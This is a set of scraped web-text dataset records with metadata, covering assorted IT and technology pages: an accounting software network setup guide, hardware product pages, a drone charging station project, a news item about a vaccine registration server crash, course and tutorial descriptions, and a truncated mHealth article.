url: string (length 15-1.48k)
date: timestamp[s]
file_path: string (length 125-155)
language_score: float64 (0.65-1)
token_count: int64 (75-32.8k)
dump: string (96 classes)
global_id: string (length 41-46)
lang: string (1 class)
text: string (length 295-153k)
domain: string (67 classes)
http://xyfon.com/tech-tips/configuring-sage-simply-accounting-windows-server-2008-r2/
2013-05-25T16:03:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705958528/warc/CC-MAIN-20130516120558-00013-ip-10-60-113-184.ec2.internal.warc.gz
0.833592
723
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__162647479
en
Issue: Simply Accounting is installed and can open the data locally, but the data installed on the server cannot be accessed. When opening the data file on the server, the connection is not established or a network timeout occurs. The following steps need to be performed:
- Install the Connection Manager by selecting the server installation.
- The TCP protocol needs to be installed and bound with the Connection Manager.
- IP/host name resolution issues will result in errors while connecting, or delays when opening and closing the data. Try opening the data with the IP address of the server in the Open Company window. DNS must come from the same source for the workstations and the server. Multihoming does not work with the Connection Manager.
- Access your Windows Control Panel (through Start, Settings). Click Windows Firewall and click the Exceptions tab. Make sure SimplyConnectionManger.exe, mysqladmin.exe and mysqld-nt.exe are included in the Exceptions list.
- Click the Add Ports tab. Type Simply Accounting Data1 in the Name field, type 13540 for the port number, and click OK.
- Click the Add Ports tab. Type Simply Accounting Data2 in the Name field, type 13541 for the port number, and click OK. You should add at least one port per user (a quick way to verify the ports are reachable from a workstation is sketched after these steps).
- Repeat the same procedure for any third-party firewalls.
Share folder settings and Connection Manager
- To test the rights of the users accessing the data, right-click your data folder and choose Sharing and Security from the drop-down menu. Select the Share this folder radio button and click Permissions. Choose to share with EVERYONE and give full permissions to the folder. Test accessing the data from the various workstations. If the test is successful, you may wish to remove the EVERYONE group from the Permissions tab for security reasons and add each individual user to the shared permissions instead. If the users are not available to add, proceed to the next step.
- Use Computer Management to add the LAN users. Open the Control Panel (Windows Start, Settings), Administrative Tools and then Computer Management. Select Local Users and Groups, then Users, and add the user here. Once the user(s) have been added, go back to the previous step and add the individual user to the shared permissions on the data folder.
- Try again to open the data across the network. If another connection error message is generated, proceed to the next step.
- Add the local server administrator (not the global admin) to the Log On account for the Connection Manager service. To do this, open the Control Panel, then Administrative Tools, then Services. Find the Simply Accounting Database Connection Manager in the services list and double-click it to open the Properties window. Click the Log On tab and add the local administrator. Confirm the service is enabled at this stage and click OK. Open the Simply Accounting Database Connection Manager Properties window again, then stop and start the Connection Manager service on the server. Try again to open the database across the network. If unsuccessful, proceed to the next step.
- Go to Start, Run and type secpol.msc. Scroll through the User Rights Assignments and double-click Log on as a service. Add the network users to the log-on list and click OK. Stop and start the Connection Manager again (Control Panel, Administrative Tools, Services). Please note these are not the domain permissions but the local permissions for the server.
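To check from a client machine whether the Connection Manager ports above are actually reachable before digging into share permissions, a minimal test like the following Python sketch can help. The server address is a placeholder, and the port numbers (13540, 13541) are the ones configured in the firewall steps; adjust both for your environment.

```python
# Minimal sketch: test whether the Connection Manager ports (13540/13541, as
# configured in the firewall exceptions above) accept TCP connections from this
# workstation. SERVER is a hypothetical address; replace it with your server's
# host name or IP.
import socket

SERVER = "192.168.1.10"
PORTS = [13540, 13541]

for port in PORTS:
    try:
        with socket.create_connection((SERVER, port), timeout=5):
            print(f"Port {port} on {SERVER} is reachable.")
    except OSError as exc:
        print(f"Port {port} on {SERVER} is NOT reachable: {exc}")
```

If a port is unreachable from the workstation but reachable on the server itself, the firewall exception or name resolution is the more likely culprit than the Simply Accounting installation.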
systems_science
https://bureauserv.com.sg/tag/cloud-computing/
2021-10-26T21:26:21
s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587926.9/warc/CC-MAIN-20211026200738-20211026230738-00616.warc.gz
0.917591
290
CC-MAIN-2021-43
webtext-fineweb__CC-MAIN-2021-43__0__242279338
en
Tag: Cloud Computing
Cloud computing is a type of Internet-based computing that provides shared computer processing resources and data to computers and other devices on demand. It is a model for enabling ubiquitous, on-demand access to a shared pool of configurable computing resources (e.g., computer networks, servers, storage, applications and services), which can be rapidly provisioned and released with minimal management effort. Cloud computing and storage solutions provide users and enterprises with various capabilities to store and process their data in either privately owned or third-party data centers that may be located far from the user, ranging in distance from across a city to across the world. Cloud computing relies on sharing of resources to achieve coherence and economies of scale, much like a utility (such as the electricity grid) delivered over a shared network. Advocates claim that cloud computing allows companies to avoid up-front infrastructure costs (e.g., purchasing servers). It also enables organizations to focus on their core businesses instead of spending time and money on computer infrastructure. Proponents also claim that cloud computing allows enterprises to get their applications up and running faster, with improved manageability and less maintenance, and enables information technology (IT) teams to more rapidly adjust resources to meet fluctuating and unpredictable business demand. Cloud providers typically use a “pay as you go” model. This can lead to unexpectedly high charges if administrators do not adapt to the cloud pricing model.
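The "pay as you go" caveat in the last sentence comes down to simple arithmetic: small hourly rates multiplied across many instances and many hours add up quickly. The sketch below is a hypothetical back-of-envelope estimate; the rates and quantities are invented for illustration and are not any particular provider's prices.

```python
# Hypothetical pay-as-you-go estimate. All rates and quantities are invented
# illustration values, not any real provider's pricing.
HOURS_PER_MONTH = 24 * 30

def monthly_cost(instances, hourly_rate, gb_egress, egress_rate_per_gb):
    compute = instances * hourly_rate * HOURS_PER_MONTH
    transfer = gb_egress * egress_rate_per_gb
    return compute + transfer

# Two small test servers left running around the clock:
print(monthly_cost(instances=2, hourly_rate=0.10, gb_egress=50, egress_rate_per_gb=0.09))    # 148.5
# Scaling to twenty servers without adjusting the budget:
print(monthly_cost(instances=20, hourly_rate=0.10, gb_egress=500, egress_rate_per_gb=0.09))  # 1485.0
```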
systems_science
https://www.cetoni.com/products/io-module-qmix-io/
2019-01-22T07:46:35
s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583829665.84/warc/CC-MAIN-20190122054634-20190122080634-00335.warc.gz
0.767535
1,219
CC-MAIN-2019-04
webtext-fineweb__CC-MAIN-2019-04__0__157469591
en
Connecting External Devices and Sensors
The Qmix I/O module can extend any Qmix system to incorporate a multitude of analog and digital inputs and outputs, making it possible to easily connect external devices and sensors to an existing Qmix setup. The terminal system of the I/O module lets you connect and remove signal lines very simply and quickly.
- 8 digital inputs (e.g. for external trigger signals)
- 8 digital outputs (e.g. for switching external devices)
- 4 valve outputs to control external digital valves
- 6 analog inputs 0…10 V (to evaluate external sensor signals)
- 2 analog PT100 temperature sensor inputs
- 4 analog outputs 0…10 V
All I/O Channels at a Glance
The QmixElements I/O plugin enables fast and easy access to all analog and digital input and output channels in your Qmix system. You can select the description, scaling, icon and unit for each channel. This lets you adapt the display of channels to your application in the optimum way.
- Individual description and scaling (factor & offset) for each channel
- Real-time recording of sensor data
- Script functions for the automation of processes
Automating Processes and Actuating External Devices
Triggering events, converting measurement values, monitoring measuring ranges… Like all other devices, analog and digital I/O channels are integrated into the QmixElements scripting system through the respective scripting functions. You can load analog sensor values or send analog signals. You can trigger certain processes through external signals or synchronize your process with external devices using trigger signals, thanks to the script system. Do you want to control the flow rate of a pump in real time, using an analog input signal? You can program that too in just a few minutes, through drag & drop.
Recording Sensor Values in Real Time
Visualize, analyze, optimize… In QmixElements you can record the values of all analog and digital inputs and outputs in the form of curves or CSV files. This lets you visualize temporal changes of process data or connected sensors (pressure, temperature, etc.) live and in real time. You can configure the recording through drag & drop and save diagrams in various formats (PNG, JPG, PDF…). Using CSV files, recorded measurement values can be analyzed or graphically processed conveniently in Excel or any other analysis program of your choice.
Laboratory Automation Platform
The QmixElements software is a comprehensive, plugin-based, modular software solution for the control of all cetoni devices via a common graphical user interface. The software consists of a core that provides the basic features and services, such as the application window, the event log or the tool bar.
Qmix SDK Analog I/O Library: Windows 32-bit / 64-bit DLLs
You can read analog inputs of Qmix I/O modules, analog pressure measuring inputs of the Qmix P modules or the analog inputs of neMESYS syringe pumps with one uniform interface used across all devices – the analog I/O library. All functions are supplied through a Windows DLL (32-bit / 64-bit), enabling simple and inexpensive integration into any 32- or 64-bit Windows development environment supporting the use of DLLs. Some of the things you can do:
- Write analog outputs
- Read analog inputs
- Configure the software scaling of measuring parameters
Qmix SDK Analog I/O LabVIEW Kit: Full LabVIEW Integration
The LabVIEW kit lets you integrate the Qmix SDK analog I/O library into your LabVIEW environment with minimal effort.
You will be provided with a selection of finished VIs to access analog inputs and outputs of Qmix modules.
Qmix SDK Digital I/O Library: Windows 32-bit / 64-bit DLLs
If you want to work with digital inputs and outputs, the digital I/O library is the perfect solution for you. It lets you access digital I/Os of Qmix I/O modules or digital inputs of neMESYS dosing modules as well as neMAXYS axis systems, for example. All functions are provided through a Windows DLL (32-bit / 64-bit), enabling simple and inexpensive integration into any 32- or 64-bit development environment supporting the use of DLLs. You will receive functions for:
- Reading digital inputs
- Setting digital outputs
Qmix SDK Digital I/O LabVIEW Kit: Full LabVIEW Integration
The Qmix SDK digital I/O LabVIEW kit is a full LabVIEW library, including all VIs for accessing digital inputs and outputs of neMESYS and Qmix modules. In combination with the other Qmix SDK LabVIEW libraries, you can truly integrate all cetoni devices into your LabVIEW applications.
Qmix Software Development Kit (SDK): For integration of cetoni devices into custom applications
The Qmix SDK is a powerful software package that allows developers to integrate their Qmix system and its various modules into their applications. Central to the Qmix SDK are device-specific libraries that provide the programming interfaces (APIs) for each Qmix module (neMESYS pumps, rotAXYS and neMAXYS positioning systems, Qmix IO, etc.).
Technical data:
- Dimensions (L x W x H): 310 x 72 x 112 mm
- Supply voltage: 24 V DC
- Power consumption: load-dependent (max. 120 W)
- Operating temperature: 0 to 50 °C
- Storage temperature: -20 to 75 °C
- Operating humidity: 20% to 90%, non-condensing
- Storage humidity: 20% to 90%, non-condensing
- PT-100 temperature inputs: 2
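Because the analog and digital I/O libraries described above are delivered as plain Windows DLLs, they can in principle be driven from any environment that can load a DLL, not just LabVIEW. The Python sketch below shows what such a call might look like via ctypes. The DLL file name, function name, signature and return convention are invented placeholders for illustration only; the real exported functions are defined in the Qmix SDK documentation.

```python
# Illustrative only: the DLL name, function name and signature below are
# hypothetical placeholders, NOT the real Qmix SDK API. Consult the SDK
# documentation for the actual exported functions.
import ctypes

# Load a (hypothetical) analog I/O DLL shipped with an SDK.
analog_io = ctypes.WinDLL("ExampleAnalogIO.dll")

# Declare the assumed signature of a channel-read function.
analog_io.Example_ReadAnalogInput.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_double)]
analog_io.Example_ReadAnalogInput.restype = ctypes.c_int   # 0 = success (assumed convention)

value = ctypes.c_double()
status = analog_io.Example_ReadAnalogInput(0, ctypes.byref(value))  # channel 0
if status == 0:
    print(f"Analog input 0 reads {value.value:.3f} V")
else:
    print(f"Read failed with error code {status}")
```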
systems_science
https://atl.recruit-tech.co.jp/berlin_tokyo/results/phase_01/
2019-09-20T05:31:32
s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573832.23/warc/CC-MAIN-20190920050858-20190920072858-00294.warc.gz
0.912145
507
CC-MAIN-2019-39
webtext-fineweb__CC-MAIN-2019-39__0__130753123
en
A Charging Station for Quadrocopters
Development of an IoT device for businesses utilizing quadrocopters
PROJECT PERIOD: 2.5 months
We have developed a charging station for quadrocopters. By installing stations on rooftops that quadrocopters can use to recharge their batteries if they run low during flight, we aim to alleviate the battery limitation that was becoming a bottleneck. The primary focus of this phase was developing the roof for the charging station.
About the Technology Used
Real-time notifications of quadrocopter approach and streaming function
By using a small Linux board (Raspberry Pi), it is possible to utilize the many software assets accumulated in Linux development and achieve not only down-sizing and energy-saving, but also network connection, email transmission, streaming of images captured by a web camera and so on. The approach of a quadrocopter is detected through motion detection by the camera mounted on the charging station, and an email notification is sent. Streaming from the web camera enables control while confirming the state of the quadrocopter.
A retractable roof able to be operated remotely
We have developed a retractable roof which can be operated remotely from PCs or smartphones. After several prototype builds, we adopted a “stroller model” (like the hood of a baby’s pram). The command for the roof to open or close is sent from the device via the internet to the Raspberry Pi, which relays it to the Arduino, causing the motor to move. The opening and closing speed is adjustable, and the roof can be set to fully open or half open.
A control function compatible with any device
Using Node.js’s Socket.IO, we have enabled real-time control through socket communication, which maintains a persistent connection between the server and client. Moreover, special-purpose applications are not required, with all control being possible through a browser. This means that any device, whether it be a PC, smartphone or something else, can be used to control the charger from anywhere in the world.
Tentative sales of a roofless version of this charger began this January (http://skysense.de/). Currently, development is ongoing, with a focus on higher performance of the charging system (universalization, more supporting products) and roof implementation. We are also searching for and investigating highly water-resistant materials for the roof. In the future, we plan to start working on the development of automatic landing, etc.
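As a rough illustration of the Raspberry Pi's role as the bridge between the network and the Arduino-driven roof motor, the sketch below accepts an "open" or "close" command over a TCP socket and forwards it to the Arduino over a serial link. This is a simplified, assumption-heavy sketch (the serial device path, baud rate, listening port and command words are placeholders), not the project's actual code, which exposed browser control via Node.js and Socket.IO.

```python
# Minimal sketch of a Pi-side relay: receive "open"/"close" over TCP and
# forward the command to an Arduino over serial. Device path, baud rate,
# port and command words are placeholder assumptions, not the real project code.
import socket
import serial  # pyserial

arduino = serial.Serial("/dev/ttyACM0", 9600, timeout=1)  # assumed serial device

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 9000))  # arbitrary example port
server.listen(1)

while True:
    conn, _addr = server.accept()
    with conn:
        command = conn.recv(64).decode().strip().lower()
        if command in ("open", "close"):
            arduino.write((command + "\n").encode())  # Arduino sketch parses one command per line
            conn.sendall(b"OK\n")
        else:
            conn.sendall(b"UNKNOWN COMMAND\n")
```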
systems_science
http://newworksummit.com/conferences/new-work-summit-2017/speakers/dr-astro-teller
2017-07-23T06:33:39
s3://commoncrawl/crawl-data/CC-MAIN-2017-30/segments/1500549424287.86/warc/CC-MAIN-20170723062646-20170723082646-00435.warc.gz
0.969291
279
CC-MAIN-2017-30
webtext-fineweb__CC-MAIN-2017-30__0__196020231
en
Dr. Astro Teller currently oversees X, Alphabet's moonshot factory for building magical, audaciously impactful ideas that through science and technology can be brought to reality. Before joining Google/Alphabet, Teller was the co-founding C.E.O. of Cerebellum Capital, Inc., an investment management firm whose investments are continuously designed, executed and improved by a software system based on techniques from statistical machine learning. Teller was also the co-founding C.E.O. of BodyMedia, Inc., a leading wearable body-monitoring systems company. Prior to starting BodyMedia, Teller was co-founding C.E.O. of SANDbOX AD, an advanced development technology incubator. Before his tenure as a business executive, Teller taught at Stanford University and was an engineer and researcher for Phoenix Laser Technologies, Stanford’s Center for Integrated Systems, and The Carnegie Group Incorporated. Teller holds a Bachelor of Science in computer science from Stanford University, Master of Science in symbolic and heuristic computation, also from Stanford University, and a Ph.D. in artificial intelligence from Carnegie Mellon University. Through his work as a scientist, inventor and entrepreneur, Teller holds many U.S. and international patents related to his work in hardware and software technology. Teller is also a successful novelist and screenwriter.
systems_science
https://www.talentgear.com/learn/march-2019/assessments-it/?feed=articles
2020-03-30T09:58:35
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370496901.28/warc/CC-MAIN-20200330085157-20200330115157-00555.warc.gz
0.83148
98
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__108679939
en
By Kristeen Bullwinkle & The Talent Gear Team | February 27, 2019
Research, design, develop, and test operating systems-level software, compilers, and network distribution software for medical, industrial, military, communications, aerospace, business, scientific, and general computing applications. Set operational specifications and formulate and analyze software requirements. May design embedded systems software. Apply principles and techniques of computer science, engineering, and mathematical analysis.
systems_science
https://www.starcourier.com/story/news/2021/02/08/people-crash-site-trying-get-vaccinations-henry-stark-counties/4439480001/
2021-09-20T16:42:15
s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057083.64/warc/CC-MAIN-20210920161518-20210920191518-00636.warc.gz
0.977091
528
CC-MAIN-2021-39
webtext-fineweb__CC-MAIN-2021-39__0__195911619
en
People crash site trying to schedule vaccinations in Henry/Stark counties KEWANEE — Some area residents were able to register Monday for the Henry Stark County Health Department’s second drive-thru vaccine clinic before the server came crashing down, health officials confirmed. Over 600 COVID-19 vaccine doses were available on a first-come, first-served basis, but the increase in traffic caused the website’s server to crash, leaving many residents out in the cold. Site users were given a message that stated “temporary back-end unavailable. We are currently experiencing abnormally high traffic volume between our front-end and back-end servers, and working to restore all services as quickly as possible. Thank you for your patience.” An IT professional, speaking confidentially, told the Star Courier that the situation wasn’t surprising. “The server could not handle the load and crashed the system,” the source said. For the kind of increased traffic required to meet the demands of thousands of people vying for a few slots, the infrastructure would need to be beefed up, he said, comparing the situation to a traffic jam. “Think of it as everyone leaving their house in their car at the same time. The roads would be jam packed, no one could get anywhere,” he said. “That’s equivalent to what they are doing on the technology side,” he said, adding that the situation was likely frustrating to people. The next drive-thru clinic is scheduled for Feb. 19 at Black Hawk College, East Campus, but according to early reports by health officials not all of the time slots were filled before the server failed. On the HSCHD Facebook page, however, a post was made shortly after the registration link went live, announcing that the time slots were filled. Facebook users expressed their frustration with the system. One Facebook user wrote that she had tried to get her elderly father a time slot, but due to the high volume she couldn’t get in. Another Facebook user said that he got up early to secure a time, but within two minutes, the system had crashed. After the last registration, Rae Ann Tucker, director of health promotions for the county health department, said that while the system wasn’t perfect, over 1,200 people were able to register for the first clinic. On Monday, Tucker acknowledged that the server did crash, and around 11 a.m. the health department announced it would be opening registration back up on Monday afternoon.
systems_science
https://help.bibook.com/support/solutions/articles/80000734713-report-loading-time
2023-06-07T15:28:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224653930.47/warc/CC-MAIN-20230607143116-20230607173116-00501.warc.gz
0.969256
185
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__53715426
en
Power BI loads the report and performs its calculations in real time, which is both one of its greatest strengths and one of its weaknesses. Doing so ensures the report is based on the most up-to-date data, but it also means Power BI has to do extra work to load the report, which increases the loading time. The loading time is affected by
- the speed of your own internet connection
- the amount of RAM your browser is using (the easiest way to reduce this is by closing unused tabs)
- the complexity of the model (the P&L and balance sheet pages are usually quite complex and need a bit more time to load)
- the amount of data (which can be reduced by aggregating data, as illustrated in the sketch below)
- how many users are currently using BI Book.
You can contact us at [email protected] if the loading time is prohibitively long.
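One practical way to cut the amount of data a report has to process, as mentioned in the list above, is to aggregate it before it reaches the model. The pandas sketch below is a generic illustration with made-up file and column names; it is not part of BI Book or Power BI itself.

```python
# Generic illustration of pre-aggregation with pandas; the file and column
# names are invented for the example and are not part of BI Book/Power BI.
import pandas as pd

transactions = pd.read_csv("transactions.csv", parse_dates=["date"])

# Collapse row-level transactions to one row per account per month:
# far fewer rows for the report model to scan and calculate over.
monthly = (
    transactions
    .assign(month=transactions["date"].dt.to_period("M").astype(str))
    .groupby(["account", "month"], as_index=False)["amount"]
    .sum()
)
monthly.to_csv("transactions_monthly.csv", index=False)
print(f"Reduced {len(transactions)} rows to {len(monthly)} aggregated rows")
```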
systems_science
https://barlaz.wordpress.ncsu.edu/teaching/
2023-12-01T09:22:05
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100286.10/warc/CC-MAIN-20231201084429-20231201114429-00587.warc.gz
0.913536
196
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__157754422
en
Solid waste management is an integral component of civil infrastructure that must be addressed by virtually every municipality. Solid waste management is a highly visible and high-impact target for enhancing environmental sustainability. Appropriate selection of waste processing technologies and efficient waste management strategies can cost-effectively minimize environmental impacts, particularly through energy generation and materials recovery. Specific issues include cost, waste diversion programs, regulatory compliance, energy recovery, landfill capacity, and public opinion. This course will cover all aspects of municipal solid waste management including refuse generation, source reduction, collection, transport, recycling and resource recovery, burial in landfills, biological treatment, and combustion. The environmental and economic advantages and disadvantages of each process will be discussed. Regulations and policy relevant to municipal solid waste will also be presented and analyzed. Students are expected to integrate economic, environmental, regulatory, policy, and technical considerations into the development of engineering designs of solid waste processes and systems. The course will emphasize both engineering design and policy alternatives.
systems_science
https://slowdnn-workshop.github.io/tutorials/
2023-02-05T11:06:12
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500251.38/warc/CC-MAIN-20230205094841-20230205124841-00421.warc.gz
0.902733
1,291
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__81042442
en
The first day of the workshop features tutorial presentations from a subset of the organizers. These tutorials present an up-to-date account of the intersection between low-dimensional modeling and deep learning in an accessible format. The first session will introduce fundamental properties and theoretical results for sensing, processing, analyzing, and learning low-dimensional structures from high-dimensional data. We will first discuss classical low-dimensional models, such as sparse recovery and low-rank matrix sensing, and motivate these models by applications in medical imaging, collaborative filtering, face recognition, and beyond. Based on convex relaxation, we will characterize the conditions, in terms of sample/data complexity, under which the inverse problems of recovering such low-dimensional structures become tractable and can be solved efficiently, with guaranteed correctness or accuracy. We will transit from sensing to learning low-dimensional structures, such as dictionary learning, sparse blind deconvolution, and dual principal component analysis. Problems associated with learning low-dimensional models from sample data are often nonconvex: either they do not have tractable convex relaxations or the nonconvex formulation is preferred due to physical or computational constraints (such as limited memory). To deal with these challenges, we will introduce a systematic approach of analyzing the corresponding nonconvex landscapes from a geometry and symmetry perspective. The resulting approach leads to provable globally convergent nonconvex optimization methods. We will discuss the contemporary topic of using deep models for computing with nonlinear data, introducing strong conceptual connections between low-dimensional structures in data and deep models. We will then consider a mathematical model problem that attempts to capture these aspects of practice, and show how low-dimensional structure in data and tasks influences the resources (statistical, architectural) required to achieve a given performance level. Our discussion will revolve around basic tradeoffs between these resources and theoretical guarantees of performance. Ohio State University Continuing our exploration of deep models for nonlinear data, we will begin to delve into learned representations, network architectures, regularizations, and beyond. We will see how the tools for nonconvexity developed previously shed light on the learned representations produced by deep networks, through connections to matrix factorization. We will observe how algorithms that interact with data will expose additional connections to low-dimensional models, through implicit regularization of the network parameters. Based upon the previous discussion on the connection between low-dimensional structures and deep models, in this section, we will discuss principles for designing deep networks through the lens of learning good low-dimensional representation for (potentially nonlinear) low-dimensional structures. We will see how unrolling iterative optimization algorithms for low-dimensional problems (such as the sparsifying algorithms) naturally lead to deep neural networks. We will then show how modern deep layered architectures, linear (convolution) operators, and nonlinear activations, and even all parameters can be derived from the principle of learning a compact linear discriminative representation for nonlinear low-dimensional structures within the data. 
We will show how representations learned in this way can bring tremendous benefits in tasks such as learning generative models, noise stability, and incremental learning.
We discuss the role of sparsity in general neural network architectures, and shed light on how sparsity interacts with deep learning under the overparameterization regime, for both practitioners and theorists. A sparse neural network (NN) has most of its parameters set to zero and is traditionally considered the product of NN compression (i.e., pruning). Yet recently, sparsity has emerged as an important bridge for modeling the underlying low dimensionality of NNs, for understanding their generalization, optimization dynamics, implicit regularization, expressivity, and robustness. Deep NNs learned with sparsity-aware priors have also demonstrated significantly improved performance through a full stack of applied work on algorithms, systems, and hardware. In this talk, I plan to cover recent progress on the practical, theoretical, and scientific aspects of sparse NNs. I will try to scratch the surface of three aspects – (1) practically, why one should love a sparse NN, beyond just a post-training NN compression tool; (2) theoretically, what guarantees one can expect from sparse NNs; and (3) what the future prospects of exploiting sparsity in NNs are.
Michigan State University
In this talk, we present our work on improving machine learning for image reconstruction on three fronts – i) learning regularizers, ii) learning with no training data, and iii) ensuring robustness to perturbations in learning-based schemes. First, we present an approach for supervised learning of sparsity-promoting regularizers, where the parameters of the regularizer are learned to minimize reconstruction error on a paired training set. Training involves a challenging bilevel optimization problem with a nonsmooth lower-level objective. We derive an expression for the gradient of the training loss using the implicit closed-form solution of the lower-level variational problem, and provide an accompanying exact gradient descent algorithm (dubbed BLORC). Our experiments show that the gradient computation is efficient and BLORC learns meaningful operators for effective denoising. Second, we investigate the deep image prior (DIP) scheme that recovers an image by fitting an overparameterized neural network directly to the image’s corrupted measurements. To address DIP’s overfitting and performance issues, recent work proposed using a reference image as the network input. However, obtaining the reference often requires supervision. Hence, we propose a self-guided scheme that uses only undersampled measurements to estimate both the network weights and the input image. We exploit regularization requiring the network to be a powerful denoiser. Our self-guided method gives significantly improved reconstructions for MRI with limited measurements compared to recent schemes, while using no training data. Finally, recent studies have shown that trained deep reconstruction models can be over-sensitive to tiny input perturbations, which cause unstable, low-quality reconstructed images. To address this issue, we propose Smoothed Unrolling (SMUG), which incorporates a randomized smoothing-based robust learning operation into a deep unrolling architecture and improves the robustness of MRI reconstruction with respect to diverse perturbations.
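Several of the tutorials above revolve around the same basic computational object: an iterative sparse-recovery algorithm whose iterations can be unrolled into the layers of a deep network. As a concrete reference point, here is a minimal NumPy sketch of ISTA (iterative soft-thresholding) for the problem min_x 0.5*||Ax - y||^2 + lambda*||x||_1. The problem sizes and parameters are arbitrary illustration values; a LISTA-style unrolled variant would replace the fixed step size and threshold with trainable parameters.

```python
# Minimal ISTA sketch for sparse recovery: min_x 0.5*||A x - y||^2 + lam*||x||_1.
# Unrolling a fixed number of these iterations, with the threshold and matrices
# treated as learnable parameters, gives the LISTA-style construction discussed
# in the tutorials. Sizes and parameters here are arbitrary.
import numpy as np

rng = np.random.default_rng(0)
m, n, k = 50, 200, 5                       # measurements, signal length, sparsity
A = rng.standard_normal((m, n)) / np.sqrt(m)
x_true = np.zeros(n)
x_true[rng.choice(n, k, replace=False)] = rng.standard_normal(k)
y = A @ x_true

def soft_threshold(z, t):
    return np.sign(z) * np.maximum(np.abs(z) - t, 0.0)

lam = 0.05
step = 1.0 / np.linalg.norm(A, 2) ** 2     # 1/L, with L the gradient's Lipschitz constant
x = np.zeros(n)
for _ in range(500):
    x = soft_threshold(x - step * A.T @ (A @ x - y), step * lam)

print("relative error:", np.linalg.norm(x - x_true) / np.linalg.norm(x_true))
```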
systems_science
https://innovativentgov.com/?capabilities
2020-10-21T07:21:45
s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107876136.24/warc/CC-MAIN-20201021064154-20201021094154-00044.warc.gz
0.894069
188
CC-MAIN-2020-45
webtext-fineweb__CC-MAIN-2020-45__0__17920224
en
Innovative Networking Technology, Inc. operates with full trust, respect and collaboration with our clients. We enable our multiple-disciplined Subject Matter Experts using our service optimization pod methodology to deliver cybersecurity, management consulting, systems engineering & architecture services, cloud/mobile optimization strategy and health IT services to our clients. Our depth of knowledge creates opportunities for our clients to achieve their goals and accomplish their objectives on time and within budget. - Management Consulting - Systems Engineering & Architecture - Cloud Security Architecture Strategy - Healthcare IT At Innovative Networking Technology, Inc. we work to make technology simpler and manageable. Instead of having to work with multiple vendors to fulfill your needs, you can rely on Innovative Networking Technology, Inc. to work with vendors on your behalf, to evaluate, acquire, deploy and support the different aspects of your IT infrastructure. Our recommendations will be well-informed, trustworthy, and unbiased.
systems_science
https://easyarticleshub.com/article.php?post=the-evolution-of-custom-mhealth-apps-trends-and-innovations
2024-04-22T15:35:44
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818312.80/warc/CC-MAIN-20240422144517-20240422174517-00504.warc.gz
0.91512
910
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__99550629
en
In recent years, the healthcare industry has witnessed a significant transformation with the advent of mobile health (mHealth) applications. These innovative tools have revolutionized the way patients interact with healthcare services, providing convenient access to information, monitoring, and communication. In particular, custom mHealth app development has emerged as a key area of focus, allowing healthcare organizations to tailor solutions to their specific needs and requirements. In this article, we will explore the evolution of custom mHealth apps, highlighting the latest trends and innovations shaping the industry. The Rise of Custom mHealth App Development: Custom mHealth app development has gained momentum as healthcare providers recognize the importance of personalized solutions in improving patient care and engagement. Unlike off-the-shelf applications, custom mHealth apps are designed to meet the unique needs of healthcare organizations, incorporating features and functionalities tailored to their workflows and patient populations. This approach allows for greater flexibility, scalability, and innovation, enabling healthcare providers to deliver more efficient and effective care. Key Trends in Custom mHealth App Development: Patient-Centric Design: One of the most significant trends in custom mHealth app development is the focus on patient-centric design. Developers are prioritizing user experience and usability, ensuring that apps are intuitive, accessible, and engaging for patients of all ages and backgrounds. Features such as personalized dashboards, interactive tools, and educational content are being integrated to empower patients to take control of their health and well-being. Integration of Wearable Devices: With the growing popularity of wearable devices such as smartwatches and fitness trackers, custom mHealth apps are increasingly integrating with these technologies to collect real-time health data. By leveraging data from wearables, healthcare providers can gain valuable insights into patients' activity levels, vital signs, and overall health status, enabling more proactive and personalized care interventions. Telemedicine and Remote Monitoring: The COVID-19 pandemic has accelerated the adoption of telemedicine and remote monitoring solutions, driving demand for custom mHealth apps that facilitate virtual consultations and remote patient monitoring. These apps enable healthcare providers to deliver care remotely, reducing the need for in-person visits and improving access to healthcare services, particularly in underserved communities. AI-Powered Analytics: Artificial intelligence (AI) and machine learning (ML) technologies are increasingly being integrated into custom mHealth apps to analyze vast amounts of health data and generate actionable insights. AI-powered analytics can help healthcare providers identify trends, predict health outcomes, and personalize treatment plans, leading to more effective and efficient care delivery. Data Security and Compliance: With the growing concerns around data privacy and security, custom mHealth app developers are placing a greater emphasis on implementing robust security measures and ensuring compliance with regulations such as the Health Insurance Portability and Accountability Act (HIPAA). Encryption, authentication, and access control mechanisms are being deployed to safeguard sensitive patient information and maintain trust in the healthcare ecosystem. 
Innovations Driving Custom mHealth App Development: Personalized Health Coaching: Custom mHealth apps are incorporating personalized health coaching features, allowing users to receive tailored guidance and support based on their individual health goals and preferences. These apps leverage AI algorithms to analyze users' health data and provide personalized recommendations for diet, exercise, medication adherence, and lifestyle modifications. Virtual Reality (VR) and Augmented Reality (AR): VR and AR technologies are being integrated into custom mHealth apps to enhance patient education, rehabilitation, and therapy experiences. For example, VR simulations can be used to educate patients about medical procedures, while AR overlays can provide real-time guidance during physical therapy sessions, improving patient outcomes and engagement. Blockchain-Based Health Records: Blockchain technology is gaining traction in the healthcare industry for its potential to secure and streamline health data exchange. Custom mHealth apps are exploring blockchain-based solutions for managing electronic health records (EHRs), enabling patients to securely access and share their medical information with healthcare providers, researchers, and other stakeholders. Custom mHealth app development is driving innovation in the healthcare industry, empowering healthcare providers to deliver more personalized, 